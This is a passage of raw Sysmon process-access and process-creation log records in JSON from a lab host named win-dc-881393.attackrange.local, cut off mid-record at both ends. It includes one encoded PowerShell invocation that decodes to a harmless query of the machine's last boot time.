05:47:09.812","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2451,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.812\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.812","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2452,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.812\r\nSourceProcessGUID: {A837DB8D-01DD-5F25-0000-0010D9560400}\r\nSourceProcessId: 4116\r\nSourceThreadId: 4136\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-01DD-5F25-0000-001030590400}\r\nTargetProcessId: 4180\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.812","SourceProcessGUID":"{A837DB8D-01DD-5F25-0000-0010D9560400}","SourceProcessId":"4116","SourceThreadId":"4136","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-01DD-5F25-0000-001030590400}","TargetProcessId":"4180","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2453,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.824\r\nProcessGuid: {A837DB8D-01DD-5F25-0000-0010FB590400}\r\nProcessId: 4192\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.14393.206 (rs1_release.160915-0644)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUA\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-01DA-5F25-0000-002027420400}\r\nLogonId: 0x44227\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453\r\nParentProcessGuid: {A837DB8D-01DD-5F25-0000-001030590400}\r\nParentProcessId: 4180\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUA","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.824","ProcessGuid":"{A837DB8D-01DD-5F25-0000-0010FB590400}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","FileVersion":"10.0.14393.206 (rs1_release.160915-0644)","Description":"Windows PowerShell","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"PowerShell.EXE","CommandLine":"PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUA","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-01DA-5F25-0000-002027420400}","LogonId":"0x44227","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453","ParentProcessGuid":"{A837DB8D-01DD-5F25-0000-001030590400}","ParentProcessId":"4180","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUA","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2454,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.812\r\nSourceProcessGUID: {A837DB8D-01DD-5F25-0000-001030590400}\r\nSourceProcessId: 4180\r\nSourceThreadId: 4184\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {A837DB8D-01DD-5F25-0000-0010FB590400}\r\nTargetProcessId: 4192\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.812","SourceProcessGUID":"{A837DB8D-01DD-5F25-0000-001030590400}","SourceProcessId":"4180","SourceThreadId":"4184","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{A837DB8D-01DD-5F25-0000-0010FB590400}","TargetProcessId":"4192","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2455,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.812\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01DD-5F25-0000-0010FB590400}\r\nTargetProcessId: 4192\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.812","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01DD-5F25-0000-0010FB590400}","TargetProcessId":"4192","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2456,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.812\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.812","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2457,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.812\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.812","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2458,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.812\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.812","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:09","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2459,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.812\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 